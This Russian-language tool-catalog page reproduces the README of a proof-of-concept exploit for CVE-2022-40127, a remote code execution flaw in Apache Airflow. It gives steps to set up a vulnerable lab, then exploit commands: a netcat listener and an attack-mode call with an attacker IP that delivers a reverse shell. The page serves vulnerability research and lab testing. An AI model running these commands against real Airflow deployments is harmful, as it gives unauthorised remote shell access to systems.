Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/jakabakos/cve-2022-40127-airflow-rce
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеRed Teaming
GitHubjakabakos/cve-2022-40127-airflow-rce

CVE-2022-40127-Airflow-RCE

Эксплойт proof-of-concept для CVE-2022-40127, нацеленный на RCE в Apache Airflow через поддельный параметр run_id, с автоматической доставкой обратного шелла.

Репозиторий
2123 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Apache Airflow < 2.4.0 RCE (CVE-2022-40127)

PoC для CVE-2022-40127 — это уязвимость RCE в Apache Airflow, затрагивающая версии до 2.4.0.

Официальное описание отчета гласит:

Уязвимость в Example Dags Apache Airflow позволяет атакующему с доступом к UI, способному запускать DAG, выполнять произвольные команды через вручную заданный параметр run_id. Эта проблема затрагивает версии Apache Airflow до 2.4.0.

Репозиторий создан для публикации анализа CVE в блоге vsociety blog.

https://github.com/jakabakos/CVE-2022-40127/assets/42498816/2094f2ec-f074-41e6-99f4-f9f77dd09df6

Использование

Вы можете клонировать репозиторий:

root@kitploit:~
git clone https://github.com/jakabakos/CVE-2022-40127.git

Установка и запуск Airflow v2.3.4

Через docker-compose

Скачайте docker-compose файл из официального репозитория

root@kitploit:~
cd /opt/
mkdir airflow-2.3.4 && cd airflow-2.3.4
curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.3.4/docker-compose.yaml'

Запустите Airflow

root@kitploit:~
mkdir -p ./dags ./logs ./plugins
echo -e "AIRFLOW_UID=$(id -u)" > .env
docker-compose up airflow-init
docker-compose up
open localhost:8080

В этом случае и имя пользователя, и пароль будут airflow.

Вручную

Следуя официальной инструкции по установке:

root@kitploit:~
pip3.8 install "apache-airflow==2.3.4" --constraint "https://raw.githubusercontent.com/apache/airflow/constraints-2.3.4/constraints-3.7.txt"

Вы можете проверить успешность установки командами which airflow и/или airflow info.

Запустите Airflow

root@kitploit:~
airflow standalone

Посмотрите сгенерированный пароль и имя пользователя в логах.

Использование эксплойта

Сначала установите необходимые пакеты с помощью pip:

root@kitploit:~
pip3 install -r requirements.txt

Посмотрите возможные опции с помощью:

root@kitploit:~
python3 exploit.py --help

Вы можете проверить, можно ли эксплуатировать хост или нет:

root@kitploit:~
python3 exploit.py -u airflow -p airflow -url http://localhost:8080

Настройте локальный слушатель для обратной оболочки в другом сеансе терминала:

root@kitploit:~
nc -lvnp 4242

Запустите скрипт в режиме атаки этой командой:

root@kitploit:~
python3 exploit.py -u airflow -p airflow -url http://localhost:8080 -a -host <attacker_ip> -port 4242

Вы должны увидеть соединение в течение минуты или около того. proof

Скачать инструмент